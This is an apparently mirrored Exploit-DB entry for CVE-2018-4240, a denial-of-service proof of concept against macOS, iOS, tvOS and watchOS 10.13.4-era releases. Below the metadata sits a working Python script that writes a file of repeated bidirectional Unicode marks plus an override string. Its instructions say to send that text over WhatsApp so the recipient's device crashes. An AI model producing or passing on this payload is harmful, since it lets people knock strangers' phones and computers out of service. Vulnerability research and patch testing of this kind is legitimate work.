Apple MacOS 10.13.4 - Denial of Service (PoC)

vendor:

MacOS

by:

Sriram

6.5

CVSS

MEDIUM

Denial of Service

CWE

Product Name: MacOS

Affected Version From: macOS High Sierra 10.13.4

Affected Version To:

Patch Exists: NO

Related CWE: CVE-2018-4240

CPE:

Metasploit: https://www.rapid7.com/db/vulnerabilities/apple-osx-messages-cve-2018-4240/, https://www.rapid7.com/db/vulnerabilities/ubuntu-cve-2018-8828/

Other Scripts:

Platforms Tested: macOS High Sierra 10.13.4, iOS 11.3, tvOS 11.3, watchOS 4.3.0

2018

Apple MacOS 10.13.4 – Denial of Service (PoC)

Crashing Phone via RLM character. Steps to Reproduce: Run the python script to create a file called "dos_apple.txt" with a payload that will crash the victim's device when copied and pasted into WhatsApp.

Mitigation:

Source

Exploit-DB raw data:

# Exploit Title: Apple MacOS 10.13.4 - Denial of Service (PoC)
# Date: 2018-09-10
# Exploit Author: Sriram (@Sri_Hxor)
# Vendor Homepage: https://support.apple.com/en-in/HT208848
# Tested on: macOS High Sierra 10.13.4, iOS 11.3, tvOS 11.3, watchOS 4.3.0
# CVE : CVE-2018-4240 (2018)
# POC : https://medium.com/@thesriram/cold-war-between-single-message-vs-mbbs-d5e004d64eaf

# Crashing Phone via RLM character. 
# Steps to Reproduce, 

# Run the below python script as "python apple.py", it will create a file called "dos_apple.txt"
# Copy the text from the generated apple.txt
# Paste it in WhatsApp and send it, victim gotta click and it will start crashing

end = "&#8238;ereh-hcuot-t'nod"
dos = "&lrm;&rlm;"
payload = dos*1000 + end
try:
    f=open("dos_apple.txt","w")
    print "[+] Creating %s DOS payload for apple..." % ((len(payload)-len(end))/len(dos))
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "Can't create a file, check DIR permissions?"